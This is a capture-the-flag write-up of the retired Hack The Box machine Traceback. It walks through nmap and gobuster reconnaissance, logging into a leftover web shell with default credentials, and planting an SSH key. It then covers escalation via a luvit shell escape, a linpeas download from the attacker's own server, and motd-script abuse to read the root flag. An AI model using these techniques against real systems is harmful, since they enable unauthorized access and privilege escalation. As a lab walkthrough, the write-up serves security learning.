Hack The Box write up for Traceback

This was a great box!

This article is my guide for hacking traceback, one of the retired machines at HackTheBox.eu. This is my first hacking guide, so hopefully i'm doing this correctly.

I enjoyed this box. It was right at my skill level and took me about two hours to complete.

For ethical hacking, I'm using Parrot Security Linux running in a VM.

To start, instead of using the target box's IP address, I created an /etc/hosts entry for it called traceback.htb. This change makes things a lot easier because I don't need to remember the IP address of the box.

sudo echo "10.10.10.181 >> /etc/hosts

Nmap initial scan

nmap -A traceback.htb


Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 14:43 CDT
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

Pretty simple scan. It looks like web and ssh are available.

Web site looks like this:

Viewing source on the website reveals this:

Hmm...

I decided to search google for that string:

It looks like we got a hit. I'm going to see if any of those shells are installed on this server, time for gobuster.

I took that list of shells from GitHub and dumped them into a text file called shells.txt. Let's see if we can find them on the server:

Now let's fire up gobuster:

We got a hit!

I loaded the page into the browser:

http://traceback.htb/smevk.php

And this came up:

Looking at the source code of the original on GitHub, I can see a default login embedded in code.

Username: admin
Password: admin

Let's try those.

...we are in. It looks like the current user is webadmin. After browsing around in the webadmin folder, I noticed that the /home/webadmin/.ssh folder is writable. We can upload an authorized_keys file with our key in it to gain access via ssh. Gaining ssh will be very helpful.

First, let's generate an ssh key:

ssh-keygen

Now let's copy the public key to authorized_keys:

cp traceback.pub authorized_keys

Now let's upload it via the form on the website:

Great, it took it. Now let's chmod the private key so we can use it.

chmod 600 traceback

Now let's ssh into the box:

ssh -I traceback webadmin@traceback.htb

We are in!

Let's see if there are any programs we can run as root:

sudo -l

Oh, this looks promising. I google luvit and found this:

Luvit looks like a Lua application. I went to gtfobins to see if I could exploit a Lua application.

And here is our strategy. First, I executed:

sudo -u sysadmin /home/sysadmin/luvit

The application prompted me to enter something. I typed in the command I got from gtfobins but used bash instead of sh:

os.execute("/bin/bash -i")

Now I've got access to sysadmin and the first flag!

11dadca21fe54bc8d753f61fc7a47ada

Now let's see if we can get root.

I downloaded linpeas.sh from here.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

I tried to get it directly on the box, but that didn't work.

I'm going to download it to my local box and use python's built-in http server to upload it. I'm executing this in the same folder that linpeas.sh is in.

python -m SimpleHTTPServer

Now I can access it from the remote by calling:

wget http://10.10.14.26:8000/linpeas.sh

Let's make it executable:

chmod +x linpeas.sh

Now let's run linpeas.sh

./linpeas.sh

Scrolling through the output, I noticed this:

00-header seems to be the header message when you log in:

I decided to see if I could run "id" from that shell when I log in as webadmin. The command would tell me what priv's are being executed when that script is run.

echo "id" >> /etc/update-motd.d/00-header

When I log in, it should print out what user is executing that file. Hopefully root.

Boom root! Ok, let's exploit that. We know that the root flag is always /root/root.txt.

echo "cat /root/root.txt" >> /etc/update-motd.d/00-header

Now let's log in again.

And you can see the root flag printed:

b2a2c50f8f2c0d1acb6c0aaf090712c9

We are all done! We could've easily used that exploit to gain actual root on the box, but all I needed for this activity was the root flag. This box was fun! I highly recommend it.